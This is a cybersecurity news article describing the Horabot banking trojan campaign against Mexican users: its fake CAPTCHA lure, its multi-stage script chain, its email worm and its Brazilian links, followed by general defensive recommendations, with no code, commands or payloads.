An active cyber campaign involving the notorious Horabot banking trojan is once again targeting users in Mexico. This campaign employs a sophisticated multi-stage infection process combined with an email worm, transforming compromised systems into phishing relays.
Complex Multi-Stage Infection
The Horabot threat package includes a Delphi-written banking trojan paired with a PowerShell-based spreader, making it one of the most intricate financial cyber threats in Latin America. The attack initiates through a fake CAPTCHA page that misleads users into executing a harmful command via the Windows Run dialog. This trickery avoids exploiting software vulnerabilities, instead manipulating users to run a harmful HTA file, which discreetly sets off the infection chain.
This approach effectively bypasses many endpoint security measures by involving users as unintentional accomplices in their own security breach. Securelist analysts discovered this operation after detecting an unusual mshta execution alert within a client’s network. They traced this activity to a deceptive CAPTCHA page, thoroughly investigating the adversary’s setup.
Widespread Impact and Brazilian Links
During the investigation, researchers uncovered a log on the attacker’s server, revealing 5,384 infected machines, with approximately 93% of them located in Mexico. The records date back to May 2025, indicating a prolonged operation before discovery. There are also distinct connections to Brazil, as evidenced by comments in Brazilian Portuguese within the spreader’s PowerShell code and a Brazilian slang phrase used as an encryption key.
The phishing emails, crafted in Spanish, impersonate invoices or confidential documents to lure Mexican recipients. The Delphi trojan, also known as Casbaneiro and Metamorfo, deceives users with fake banking overlays to capture login credentials during active sessions.
Defensive Measures and Future Outlook
The campaign’s sophistication is highlighted by its elaborate delivery mechanism. Each stage adds a new layer of obfuscation before deploying the final malware. The HTA file retrieves a JavaScript loader from a controlled domain, which then executes an obfuscated VBScript. This script employs server-side polymorphism to thwart signature-based detection mechanisms.
To protect against such threats, security teams should block HTA file executions from untrusted sources and monitor for unusual mshta activities. Implementing YARA rules for both the Horabot Delphi trojan and AutoIT loader, alongside Suricata rules for detecting the unique C2 traffic pattern, will aid in early detection. All indicators of compromise, such as attacker domains and socket addresses, should be promptly added to network blocklists. User education on recognizing fake CAPTCHA lures and suspicious PDF attachments is vital for defense.
Stay updated with the latest cybersecurity news by following us on Google News, LinkedIn, and X. Set CSN as your preferred source in Google for more instant updates.
